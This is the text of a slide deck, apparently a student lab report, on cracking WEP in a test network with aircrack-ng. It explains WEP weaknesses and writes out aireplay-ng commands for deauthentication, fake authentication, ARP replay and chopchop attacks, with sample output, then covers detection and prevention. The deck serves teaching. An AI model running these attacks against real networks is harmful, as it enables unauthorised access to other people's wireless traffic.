You are on page 1of 146

WEP Crack Using

aircrack-ng
Arunabh Das
Content
 Part 1 - Background
 WEP
 Encryption
 Authentication
 Vulnerabilities
 Part 2 - Attack Experiment
 Cracking WEP Keys
 Test Environment
 Network Topology
 Hardware & Software
 The Attack
 Observations
 Part 3 - Conclusion
 Problems Encountered
 Detection & Prevention
 Conclusion
 References
WEP Encryption
 Wired Equivalent Privacy
 64-bit and 128-bit (24-bit IV)

 Utilizes RC4 and CRC32


WEP Authentication

 Open System Authentication

http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html
WEP Authentication

 Shared Key Authentication

http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html
WEP Vulnerability
 StaticKeys
 Short IV (24-bits)

 Susceptible to statiscal analysis based


attacks
Network Topology
attacker victim

Wireless AP
H/W and S/W requirements
ker Victim
buntu 8.04 OS: Windows XP
wl4965/Atheros AR5007 b/g NIC: D-Link WUA-2340 USB adaptor
are: Software: D-Link Wireless Connection Manager
Kismet
Airodump
Aireplay
Airjack

Wireless AP
Linksys WRT54GL
Types of attacks using aireplay
 It currently implements multiple different attacks:
 Attack 0: Deauthentication
 Attack 1: Fake Authentication
 Attack 2: Interactive Packet Replay
 Attack 3: ARP Request Replay Attack
 Attack 4: Korek Chopchop attack
 Attack 5: Fragmentation attack
 Attack 6: Caffe-latte attack
 Attack 7: Client-oriented fragmentation attack

Source - http://www.aircrack-ng.org/doku.php?id=aireplay-ng
Deauthentication
 This attack is a type of “man-in-the-middle” attack which disassocate
packets to one or more clients which are currently associated with paticular
access pont, making the client to disconnect from the AP and connect to the
cracker’s fake AP.
 The reasons to disassociating clients are :
 Generate ARP reqests,
 Force clients to re-authenticate
 Recovering a hidden ESSID
Deauthenticaton cont.
 Use aireplay to achieve the de-auth attack
Command:
aireplay-ng -0 1 -a MAC address -c MAC address ath0
-0 means deauthentication
1 is the number of deauths to send
-a MAC address of te acess point
-c MAC address of the client to de-auth
-ath0 is the interface name
Deauthentication cont.
The MAC address of the AP and the client can be get
by doing sniffing using tools like wireshark
The output of the command from the slid above will
look like:
11:09:28 Sending DeAuth to station -- STMAC:
[00:0F:B5:34:30:30]
STMAC is the MAC address of the client(then the
client is de-authenticated,and then the attacker will
be connected with the spoofed victim’s address)
Fake authentication
 Fake authentication allows the attacker to
proform the two types of WEP authentication
(open system and shared key) pls associate
with the AP, Different from deauthentication
attack, no ARP packets are generated, plus
the fake authentication is only useful when
the attacker need and associated MAC
address in other packet injection attacks but
there is currently no client is connected to the
AP
Fake auhentication cont.
 The actual aireplay command:
 aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h
00:09:5B:EC:EE:F2 -y sharedkeyxor ath0
 -1 means fake authentication
 0 reassociation timing in seconds
 -e teddy is the wireless network name
 -a 00:14:6C:7E:40:80 is the access point MAC address
 -h 00:09:5B:EC:EE:F2 is our card MAC addresss
 -y sharedkeyxor is the name of file containing the PRGA xor bits.
This is only used for shared key authentication. Open system
authentication, which is typical, does not require this.(PRGA xor
bits can be obtained from the de-auth or kork chopchop attack).
 ath0 is the wireless interface name
ARP Request Replay attack
 The classic ARP request replay attack is the most
effective way to generate new initialization
vectors(IVs).
 The program listens for an ARP packet then
retransmits it back to the access point. This, in turn,
causes the access point to repeat the ARP packet
with a new IV. Te program retransmits the same
ARP packet over and over.
 However, each ARP packet repeated by the access
point has a new IVs. It is all these new IVs which
allow you to determine the WEP key.
ARP Request Replay attack
cont.
 Basic usage
 aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
 Where:

 -3 means standard arp request replay

 -b 00:13:10:30:24:9C is the access point MAC address

 -h 00:11:22:33:44:55 is the source MAC address (either an


associated client or from fake authentication)

 ath0 is the wireless interface name


ARP Request Replay attack
cont.
A output of the above command would be:
 Saving ARP requests in replay_arp-0219-
123051.cap You should also start airodump-
ng to capture replies. Read 11978 packets
(got 7193 ARP requests), sent 3902 packets
KoreK chopchop
 This attack, when successful, can decrypt a
WEP data packet without knowing the key. It
can even work against dynamic WEP. This
attack does not recover the WEP key itself,
but merely reveals the plaintext.
 Some AP are not vulnerable to this attack
KoreK chopchop cont.
 Proform korek chopchop with aireplay
 aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b
00:14:6C:7E:40:80 ath0
 4 means the chopchop attack
 -h 00:09:5B:EC:EE:F2 is the MAC address of an
associated client or your card's MAC if you did fake
authentication
 -b 00:14:6C:7E:40:80 is the access point MAC
address
 ath0 is the wireless interface name
KoreK chopchop cont.
 Sample output of the above command
 Read 165 packets... Size: 86, FromDS: 1, ToDS: 0
(WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC =
FF:FF:FF:FF:FF:FF Source MAC =
00:40:F4:77:E5:C9 0x0000: 0842 0000 ffff ffff ffff
0014 6c7e 4080 .B..........l~@. 0x0010: 0040 f477
e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543
...H......._=..C 0x0030: d1ca 0c9b 6aeb fad6 f394
2591 5bf4 2873 ....j.....%.[.(s 0x0040: 16d4 43fb
aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F Use this packet ? y
Fragmentation Attack
 This attack, when successful, can obtain
1500 bytes of PRGA (pseudo random
generation algorithm). This attack does not
recover the WEP key itself, but merely
obtains the PRGA. The PRGA can then be
used to generate packets with packetforge-ng
which are in turn used for various injection
attacks. It requires at least one data packet to
be received from the access point in order to
initiate the attack
Korek chopchop vs.
Fragmentation Attack
 Fragmentition attack obtains the full packet
length of 1500 bytes xor, so any size of
packet could be generated, and is sufficient
to create ARP request. An is extremel fast,
however, it needs ore information such as the
IP address to launch.

 Chopchop attack don’t need to know any IP


info. Bu t is much slower and the maximum
xor its is limited .
Flow Chart for Cracking

Source – http://www.aircrack-ng.org/doku.php?id=flowchart#section_7frag_chop-chop_failed
Configuring Environment
Configure Access Point
 Set the encryption to WEP and generate keys using passphrase
Configuring Environment Step 2
Configure Access Point
 Set the SSID and the broadcast channel.
Configuring Environment Step3
Configure Access Point
 Set the Authentication type to Auto
Installation
Installation of kismet step1
Installation
Installation of kismet – step2
Installation
Installation of kismet step3
Installation
Installation of kismet step4
Installation
Installation of kismet step5
Installation
Installation of kismet step6
Installation
Installation of kismet step7
Installation
Patching of kernel Step1
 Note that the 2.6.24 version of the kernel doesn’t contain the modules that
we need
Installation
Patching of kernel Step2
 Install kernel-package libraries
Installation
Patching of kernel Step3
 Wait for complete installation of kernel-package libraries
Installation
Patching of kernel Step4
Download the latest version of the kernel using wget
Installation
Patching of kernel Step4
Installation
Patching of kernel Step5
Installation
Patching of kernel Step6
Installation
Patching of kernel Step7
Installation
Patching of kernel Step8
Installation
Patching of kernel Step9
Installation
Patching of kernel Step10
Installation
Patching of kernel Step11
 Finding a client that is connected to the AP and client’s MAC id
Installation
Patching of kernel Step12
Installation
Patching of kernel Step13
Installation –
Patching of kernel Step12
Installation
Patching of kernel Step13
Installation
Patching of kernel Step14-15
Installation
Patching of kernel Step16-17
Installation
Patching of kernel Step18
Installation
Patching of kernel Step19
Installation
Patching of kernel Step20
Installation
Patching of kernel Step21-23
Installation
Patching of kernel Step24
Installation
Patching of kernel Step25
Installation
Patching of kernel Step26
Installation
Patching of kernel Step27-28
Installation
Patching of kernel Step29
Installation
Patching of kernel Step30
Installation
Patching of kernel Step31
Installation
Patching of kernel Step32
Installation
Patching of kernel Step33
Installation
Patching of kernel Step34
Installation
Patching of kernel Step35-36
Installation
Patching of kernel Step37-38
Installation
Patching of kernel Step39-40
Installation
Patching of kernel Step41
Installation –
Patching of kernel Step42
Installation –
Patching of kernel Step43
Installation –
Patching of kernel Step44
Installation
Patching of kernel Step45
Installation
Patching of kernel Step46
Installation
Patching of kernel – 7
Installation
Patching of kernel – 8
Installation
Patching of kernel – 9
Installation
Patching of kernel – Step 50
Installation
Patching of kernel – Step 51
Installation
Patching of kernel – Step 52
Installation
Patching of kernel – Step 53
Installation
Patching of kernel – Step 54
Installation
Patching of kernel – Step 55
Preparatory Step1
Testing Injection
 Enable card to monitor mode
Preparatory Step 2
Testing Injection
 Basic test to determine if card supports injection
Preparatory –
Testing Injection
 Check hidden ID or check specific SSID
Preparatory
Testing Injection
Create 2 virtual wireless interfaces for attack test
Preparatory Step 5
Testing Injection
Reconnaisance Step 1
Reconnaisance Step 2
Reconnaisance -
Reconnaisance
Reconnaisance Step 5 -
Reconnaisance Step 6 -
Reconnaisance Step 7 -
Reconnaisance Step 8 -
Reconnaisance Step 9 -
Reconnaisance Step 9 -
Attack Without Deauth –
Step1
Attack Without Deauth
Step2 -
Attack Without Deauth
Attack Without Deauth
Attack Without Deauth
Step5
Attack Without Deauth
Step 6
Attack Without Deauth
Step 7
Attack Without Deauth
Step8
Attack Without Deauth
Step 9
Attack Without Deauth
Step 10
Attack Without Deauth
Step 11
Attack Without Deauth
Step 12
Attack Without Deauth
Step 13
Iteration 2 – ARP Request Replay without
deauthentication request
Attack Step 1
 Taking down the network interface in order to change the MAC
Iteration 2 – ARP Request Replay without deauthentication
request

Attack Step 2
 Finding a target AP and the channel it is broadcasting on.
Iteration 2 – ARP Request Replay without deauthentication
request

Attack -
 Finding a client that is connected to the AP and client’s MAC id
Iteration 2 – ARP Request Replay with deauthentication
request
Attack
Changing the attacker’s MAC id to match client’s (Spoofing)
Iteration 2 – ARP Request Replay with deauthentication
request
Attack Step 5 -

 Initiating airodump to capture packets, especially weak IVS packets


Iteration 2 – ARP Request Replay with deauthentication request

Attack Step 6 -
 Monitoring airodump to monitor rate of capture
Iteration 2 – ARP Request Replay with deauthentication request

Attack Step 7

 Initiate aireplay to inject frames


Iteration 2 – ARP Request Replay with deauthentication request

Attack Step 8
 Monitoring number of ARP requests generated
Iteration 2 – ARP Request Replay with
deauthentication request Attack Step 9
 Sending de-authentication frames to client
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 1
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 2
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth)
 Finding a client that is connected to the AP and client’s MAC id
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth)
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 5
Initiating airodump to capture packets, especially weak IVS packets
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 6
 Monitoring airodump to monitor rate of capture
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 7
 Initiate aireplay to inject frames
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 8
 Monitoring number of ARP requests generated
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 9
 Sending de-authentication frames to client
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 10
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 11
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 12
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 13
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 14
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 15
 Using airecrack to crack
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 16
 Using airecrack to crack
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 17
 Using airecrack to crack
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 18
 Using airecrack to crack
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 19
 Using airecrack to crack
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 20
 Using airecrack to crack
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 21
 Using airecrack to crack
ARP Request Replay Attack Variation 3
(spoofing MAC but no deauth) Step 22
 Using airecrack to crack
Observations/Conclusion
 WEP is weak and can be cracked easily
 We were able to crack WEP in x minutes
 WEP encrypted networks should be replaced with
WPA/WPA2
Detection/Prevention
 When an abnormal amount of ARP requests
are being made it may be a sign that a
hacker is trying to crack your WEP key
 Careful monitoring and logging of such an
event can help administrators detect such an
attack.
 Preventing such an attack is near impossible
References
[1] “Aireplay-ng”
URL: http://www.aircrack-ng.org/doku.php?id=aireplay-ng
[2] “Computer Security”
URL: http://en.wikipedia.org/wiki/Computer_security
[3] “Exploit (computer security)”
URL: http://en.wikipedia.org/wiki/Exploit_(computer_security)
Questions ?

You might also like